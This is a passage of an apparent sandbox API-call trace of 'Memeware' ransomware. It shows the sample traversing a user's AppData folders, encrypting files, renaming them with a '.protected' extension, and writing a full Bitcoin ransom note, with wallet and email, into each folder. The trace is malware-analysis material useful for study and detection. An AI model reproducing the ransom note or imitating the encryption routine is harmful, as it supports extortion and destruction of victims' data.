HALPmcxz\\AppData\\Local\\Microsoft") returned 57 [0084.523] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0084.523] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0084.523] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*") returned 59 [0084.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0084.524] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.524] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.524] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.524] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.524] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\.") returned 59 [0084.524] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.524] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.524] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.524] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.524] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.524] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.524] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\..") returned 60 [0084.524] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.524] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0084.524] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="Windows") returned -1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="Program Files") returned -1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="Program Files (x86)") returned -1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="$Recycle.bin") returned 1 [0084.524] lstrcmpiW (lpString1="Credentials", lpString2="System Volume Information") returned -1 [0084.524] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials") returned 69 [0084.524] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0084.524] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0084.524] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\*") returned 71 [0084.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.525] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.525] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.525] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.525] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.525] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.525] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\.") returned 71 [0084.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.525] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.525] 
lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.525] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.525] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.525] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.525] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.525] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.525] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.525] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.525] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\..") returned 72 [0084.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.525] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.525] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.525] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.525] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.525] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.525] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.525] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\RESTORE_FILES.txt") returned 87 [0084.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\credentials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.526] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.526] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.527] lstrlenA (lpString="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") returned 684 [0084.527] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.527] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.527] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.527] CloseHandle (hObject=0xd8) returned 1 [0084.527] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="Windows") returned -1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files") returned -1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files (x86)") returned -1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="$Recycle.bin") returned 1 [0084.527] lstrcmpiW (lpString1="Event Viewer", lpString2="System Volume Information") returned -1 [0084.527] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer") returned 70 [0084.527] lstrcmpW (lpString1="Event Viewer", lpString2=".") returned 1 [0084.527] lstrcmpW (lpString1="Event Viewer", lpString2="..") returned 1 [0084.527] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\*") returned 72 [0084.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.528] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.528] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.528] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.528] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.528] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.528] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\.") returned 72 [0084.528] lstrcmpW (lpString1=".", lpString2=".") 
returned 0 [0084.528] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.528] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.528] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.528] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.528] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.528] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.528] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\..") returned 73 [0084.528] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.528] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.528] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.528] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.528] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\RESTORE_FILES.txt") returned 88 [0084.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\event viewer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.529] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.529] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.529] lstrlenA (lpString="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") returned 684 [0084.529] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.529] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.529] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.529] CloseHandle (hObject=0xd8) returned 1 [0084.530] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="Windows") returned -1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="Program Files") returned -1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="Program Files (x86)") returned -1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="$Recycle.bin") returned 1 [0084.530] lstrcmpiW (lpString1="Feeds", lpString2="System Volume Information") returned -1 [0084.530] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds") returned 63 [0084.530] lstrcmpW (lpString1="Feeds", lpString2=".") returned 1 [0084.530] lstrcmpW (lpString1="Feeds", lpString2="..") returned 1 [0084.530] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\*") returned 65 [0084.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.542] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.542] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.542] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.542] lstrcmpiW (lpString1=".", 
lpString2="$Recycle.bin") returned 1 [0084.542] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.542] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\.") returned 65 [0084.542] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.542] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.542] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.542] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.542] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.542] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.542] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.542] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\..") returned 66 [0084.542] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.542] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.542] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Windows") returned -1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Program Files") returned -1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="Program Files (x86)") returned -1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="$Recycle.bin") returned 1 [0084.542] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="System Volume Information") returned -1 [0084.542] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") 
returned 85 [0084.542] StrStrIW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".protected") returned 0x0 [0084.542] lstrcmpW (lpString1="FeedsStore.feedsdb-ms", lpString2="RESTORE_FILES.txt") returned -1 [0084.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 85 [0084.543] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".txt") returned 0x0 [0084.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 85 [0084.544] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".rar") returned 0x0 [0084.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 85 [0084.544] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".zip") returned 0x0 [0084.544] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x1a00, lpOverlapped=0x0) returned 1 [0084.549] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.549] WriteFile 
(in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x1a00, lpOverlapped=0x0) returned 1 [0084.549] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.549] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.549] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.550] CloseHandle (hObject=0x14c) returned 1 [0084.550] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.protected") returned 95 [0084.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.protected")) returned 1 [0084.550] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.550] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Windows") returned -1 [0084.551] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Program Files") returned -1 [0084.551] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="Program Files (x86)") returned -1 [0084.551] lstrcmpiW 
(lpString1="Microsoft Feeds~", lpString2="$Recycle.bin") returned 1 [0084.551] lstrcmpiW (lpString1="Microsoft Feeds~", lpString2="System Volume Information") returned -1 [0084.551] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 80 [0084.551] lstrcmpW (lpString1="Microsoft Feeds~", lpString2=".") returned 1 [0084.551] lstrcmpW (lpString1="Microsoft Feeds~", lpString2="..") returned 1 [0084.551] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*") returned 82 [0084.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.559] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.559] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.559] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.559] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.559] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.559] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\.") returned 82 [0084.559] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.559] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.559] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.559] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.559] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.559] lstrcmpiW (lpString1="..", 
lpString2="$Recycle.bin") returned 1 [0084.559] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.559] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\..") returned 83 [0084.559] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.559] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.559] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Windows") returned -1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Program Files") returned -1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="Program Files (x86)") returned -1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="$Recycle.bin") returned 1 [0084.559] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="System Volume Information") returned -1 [0084.560] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 107 